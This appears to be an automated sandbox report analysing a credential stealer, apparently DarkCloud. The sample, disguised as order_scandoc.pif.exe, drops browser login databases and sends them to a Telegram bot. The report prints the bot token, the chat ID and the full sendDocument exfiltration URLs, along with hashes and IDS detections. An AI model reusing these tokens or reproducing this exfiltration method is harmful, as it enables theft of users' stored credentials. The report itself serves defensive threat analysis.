file_unique_idAgADJRgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Responses
oktrue
result
message_id70
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644806
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANGaNLKRovKk5Yqrbbgq5yEr-Og5mQAAiUYAAJ-EphSuAFlTWqOkZo2BA
file_unique_idAgADJRgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
PID 6264  "C:\Users\admin\Desktop\order_scandoc.pif.exe"  C:\Users\admin\Desktop\order_scandoc.pif.exe
explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0
Modules
Images
  c:\users\admin\desktop\order_scandoc.pif.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\syswow64\kernelbase.dll
  c:\windows\syswow64\apphelp.dll
  c:\windows\syswow64\oleaut32.dll
Total events: 7 496
Read events: 7 493
Write events: 3
Delete events: 0

Modification events

(PID) Process: (2064) ykwhenrvO.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (2064) ykwhenrvO.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (2064) ykwhenrvO.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:
Executable files: 1
Suspicious files: 3
Text files: 1
Unknown types: 0

Dropped files

PID | Process | Filename | Type
2064 | ykwhenrvO.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\DESKTOP-JGLLJLD-admin\WebData | binary
  MD5: 983A5B37990067066CF80EDDF2426994
  SHA256: E499265D1817B9CD52AC502B7BE6DEF5174478CAAAB7DADE263A7754E4E838D3
2064 | ykwhenrvO.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\DESKTOP-JGLLJLD-admin\keyDBPath.db | binary
  MD5: 0FF3BCDD0BE077B9EB8194B5C09F453C
  SHA256: 225D669E47EB14D8C969799C92AAEF27B66CD984872EA09284E48DB46521E651
2064 | ykwhenrvO.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\DESKTOP-JGLLJLD-admin\LoginData | binary
  MD5: A45465CDCDC6CB30C8906F3DA4EC114C
  SHA256: 4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209
6264 | order_scandoc.pif.exe | C:\Users\Public\ykwhenrvO.exe | executable
  MD5: C116D3604CEAFE7057D77FF27552C215
  SHA256: 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
2064 | ykwhenrvO.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\DESKTOP-JGLLJLD-admin\DESKTOP-JGLLJLD-admin.html | text
  MD5: 64CA6CC1A4933D8A20585E027DA46F4C
  SHA256: 52E5A4791F89A6CA5A8D0412685DAF022876AEB2F6B11C40D0538194C0EC016E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 28
TCP/UDP connections: 46
DNS requests: 19
Threats: 9

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1268 | svchost.exe | GET | 200 | 2.16.16.148:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | | | whitelisted
5944 | MoUsoCoreWorker.exe | GET | 200 | 2.16.16.148:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | | | whitelisted
1964 | RUXIMICS.exe | GET | 200 | 2.16.16.148:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | | | whitelisted
1268 | svchost.exe | GET | 200 | 23.200.213.221:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | | | whitelisted
5944 | MoUsoCoreWorker.exe | GET | 200 | 23.200.213.221:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | | | whitelisted
1964 | RUXIMICS.exe | GET | 200 | 23.200.213.221:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | | | whitelisted
2064 | ykwhenrvO.exe | GET | 200 | 162.55.60.2:80 | http://showip.net/ | unknown | | | shared
 | | POST | 200 | 20.190.159.71:443 | https://login.live.com/RST2.srf | unknown | xml | 1.24 Kb |
 | | POST | 200 | 149.154.167.99:443 | https://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/sendDocument?chat_id=6683518699&caption=PW_DESKTOP-JGLLJLD\admin\176.128.145.138 | unknown | binary | 597 b |
 | | POST | 200 | 149.154.167.99:443 | https://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/sendDocument?chat_id=6683518699&caption=PW_DESKTOP-JGLLJLD\admin\176.128.145.138 | unknown | binary | 597 b |

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | | | | whitelisted
1268 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5944 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1964 | RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
1268 | svchost.exe | 2.16.16.148:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
5944 | MoUsoCoreWorker.exe | 2.16.16.148:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
1964 | RUXIMICS.exe | 2.16.16.148:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
1268 | svchost.exe | 23.200.213.221:80 | www.microsoft.com | AKAMAI-AS | FR | whitelisted
5944 | MoUsoCoreWorker.exe | 23.200.213.221:80 | www.microsoft.com | AKAMAI-AS | FR | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.174
whitelisted
crl.microsoft.com
  • 2.16.16.148
  • 2.16.16.155
whitelisted
www.microsoft.com
  • 23.200.213.221
whitelisted
showip.net
  • 162.55.60.2
shared
api.telegram.org
  • 149.154.167.220
whitelisted
self.events.data.microsoft.com
  • 20.42.65.89
whitelisted
activation-v2.sls.microsoft.com
  • 4.154.209.85
whitelisted
login.live.com
  • 20.190.160.132
  • 20.190.160.3
  • 40.126.32.68
  • 40.126.32.138
  • 40.126.32.72
  • 20.190.160.65
  • 20.190.160.2
  • 40.126.32.76
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted

Threats

PID | Process | Class | Message
 | | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
2064 | ykwhenrvO.exe | Attempted Information Leak | ET INFO IP Check Domain (showip in HTTP Host)
2064 | ykwhenrvO.exe | A Network Trojan was detected | STEALER [ANY.RUN] DarkCloud External IP Check
2064 | ykwhenrvO.exe | Device Retrieving External IP Address Detected | ET HUNTING [ANY.RUN] DARKCLOUD Style External IP Check
2200 | svchost.exe | Misc activity | ET HUNTING Telegram API Domain in DNS Lookup
2064 | ykwhenrvO.exe | Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
2064 | ykwhenrvO.exe | Misc activity | ET HUNTING Telegram API Certificate Observed
 | | Misc activity | SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
 | | Misc activity | SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
No debug info